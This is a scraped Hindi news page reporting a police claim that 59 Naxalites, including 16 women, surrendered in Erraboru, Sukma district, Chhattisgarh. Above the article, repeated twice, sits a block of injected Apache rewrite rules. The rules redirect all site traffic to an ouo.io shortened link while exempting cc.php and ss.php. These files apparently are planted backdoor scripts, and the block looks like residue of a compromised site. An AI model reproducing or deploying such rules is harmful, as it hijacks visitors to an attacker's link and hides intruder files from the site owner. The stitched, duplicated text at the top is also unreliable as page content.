
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 454
Previousरायपुर। छत्तीसगढ़ के सुकमा जिले में आज 59 नक्सलियों के आत्मसमर्पण करने का दावा पुलिस ने किया है। पुलिस का दावा है कि ये सभी आरोपी नक्सली लंबे समय से पुलिस के संपर्क में थे और आत्मसमर्पण करना चाह रहे थे। सुकमा के एर्राबोर में नक्सलियों ने समर्पण किया है। आत्मसर्मण के दौरान बस्तर के आईजी विवेकांनद सिन्हा और जिले के पुलिस अधीक्षक अभिषेक मीणा भी मौजूद थे। दावा किया जा रहा है कि सुकमा जिले में नक्सलियों का इस साल का अब तक का सबसे बड़ा समर्पण है। एर्राबार धुर नक्सल प्रभावित इलाका है और आए दिन नक्सली किसी बड़ी घटना को अंजाम देते रहते हैं। समर्पण में 16 महिलाएं भी शामिल। पुलिस के मुताबिक समर्पण करने वाले आरोपी नक्सली गगनपल्ली, मनिकुंटा और डब्बाकोंटा इलाके में सक्रिय थे। नक्सलियों की नीति से परेशान होकर इन्होंने हिंसा का रास्ता छोड़ा है।